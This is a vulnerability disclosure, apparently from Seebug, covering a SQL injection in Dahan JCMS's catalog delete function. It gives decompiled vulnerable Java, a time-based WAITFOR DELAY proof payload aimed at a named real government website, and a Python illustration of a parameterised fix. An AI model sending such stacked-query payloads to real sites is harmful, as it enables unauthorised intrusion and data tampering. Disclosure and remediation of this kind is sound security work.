### Brief description:
Dahan JCMS (大汉 jcms) SQL injection vulnerability
### Details:
Vulnerable method in `jcms.blf.user.CatalogBlf.class` (decompiled; the `strId` argument is concatenated into the query unfiltered):
```
public boolean doDelete(String strId)
{
    boolean flag = false;
    // strId is pasted straight into both IN(...) lists; nothing validates it
    String strSql = "SELECT i_id FROM wap_cataloginfo WHERE i_parentid IN(" + strId + ") OR i_id IN(" + strId + ")";
    String[][] arrAnswer = Manager.doQuery(this.strAppID, strSql);
    if (arrAnswer != null)
    {
        StringBuffer sbId = new StringBuffer(arrAnswer.length * 2);
        for (int i = 0; i < arrAnswer.length; i++)
        {
            sbId.append(arrAnswer[i][0]);
            sbId.append(",");
        }
        // remainder of the method is not shown in the report
    }
    return flag;
}
```
Calling file: `m_5_d/opr_wap_col.jsp` (the `D` branch is reached with `fn_billstatus=D`; `strid` comes straight from the request and is passed to `doDelete` without any check):
```
} else if ("D".equals(strBillStatus))
{
    boolean flag = false;
    String strid = Convert.getParameter(request, "strid"); // raw request parameter
    StringBuffer sbScript = new StringBuffer();
    flag = catalogblf.doDelete(strid); // textbook injection: user input goes straight into the SQL
    if (flag)
    {
        String[] arrid = strid.split(",");
        for (int i = 0; i < arrid.length; i++)
        {
            // remainder of the loop is not shown in the report
        }
    }
```
### Proof of vulnerability:
Open www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D
The response time is normal.
Open http://www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222);WAITFOR DELAY '0:0:5'--&fn_billstatus=D
The response is delayed by about 5 seconds: a textbook time-based (blind) injection. `WAITFOR DELAY` is T-SQL, so the backend is SQL Server and the `;` closes the first `IN(...)` and stacks a second statement; the trailing `--` comments out the rest of the original query.
![dahan.png](https://images.seebug.org/upload/201405/22151402a1075ca7b930eadad55981d2a869ad14.png)
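The following Python block is an added example (not code from the report or from Dahan JCMS) covering both the concatenation in `CatalogBlf.doDelete` and the proof payload above. It mirrors the vulnerable string building to show exactly what the `WAITFOR DELAY` payload turns the query into, then shows the fix a practitioner would apply: validate `strid` as the comma-separated integer list the JSP already expects (it later calls `strid.split(",")`) and bind one placeholder per id. The table `wap_cataloginfo` with columns `i_id`/`i_parentid` is taken from the report; the sample rows are constructed, and SQLite stands in for the real SQL Server backend only so the hardened query can be executed offline.

```python
import re
import sqlite3

# Constructed sample rows (i_id, i_parentid); not data from the report.
SAMPLE_ROWS = [(1, 0), (2, 1), (3, 1), (4, 2), (5, 0)]

# Payload used in the report's proof section.
POC_PAYLOAD = "122222222);WAITFOR DELAY '0:0:5'--"


def build_vulnerable_sql(strid: str) -> str:
    """Mirror of the concatenation in CatalogBlf.doDelete: strid is pasted
    into both IN(...) lists without validation."""
    return ("SELECT i_id FROM wap_cataloginfo WHERE i_parentid IN("
            + strid + ") OR i_id IN(" + strid + ")")


# Only what opr_wap_col.jsp actually needs: digits separated by commas.
_ID_LIST = re.compile(r"\d+(,\d+)*")


def parse_id_list(strid: str) -> list[int]:
    """Reject anything that is not a comma-separated list of integers
    before it can reach SQL."""
    if not _ID_LIST.fullmatch(strid):
        raise ValueError("strid must be a comma-separated list of integers")
    return [int(x) for x in strid.split(",")]


def rejects(strid: str) -> bool:
    """True if the hardened parser refuses this strid value."""
    try:
        parse_id_list(strid)
    except ValueError:
        return True
    return False


def build_safe_sql(strid: str) -> tuple[str, list[int]]:
    """Hardened equivalent: one bound '?' per id, ids passed as parameters
    (the Java fix would use PreparedStatement the same way)."""
    ids = parse_id_list(strid)
    marks = ",".join("?" * len(ids))
    sql = ("SELECT i_id FROM wap_cataloginfo WHERE i_parentid IN("
           + marks + ") OR i_id IN(" + marks + ")")
    return sql, ids + ids  # same ids bound for both IN lists


def select_ids(strid: str) -> list[int]:
    """Run the hardened query against an in-memory SQLite copy of the table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wap_cataloginfo (i_id INTEGER, i_parentid INTEGER)")
    conn.executemany("INSERT INTO wap_cataloginfo VALUES (?, ?)", SAMPLE_ROWS)
    sql, params = build_safe_sql(strid)
    rows = conn.execute(sql, params).fetchall()
    conn.close()
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    print(build_vulnerable_sql(POC_PAYLOAD))   # shows the stacked WAITFOR DELAY
    print(rejects(POC_PAYLOAD))                # True: payload never reaches SQL
    print(build_safe_sql("1,2"))               # placeholders plus bound ids
    print(select_ids("1,2"))                   # children of 1,2 plus 1,2 themselves
```

Note that the vulnerable query is executed first and its result feeds the later delete, so the injection is reachable before any id is actually deleted; with `WAITFOR DELAY` stacked after the first `IN(...)`, the server sleeps regardless of whether `122222222` exists, which is why a non-existent id gives a clean timing baseline.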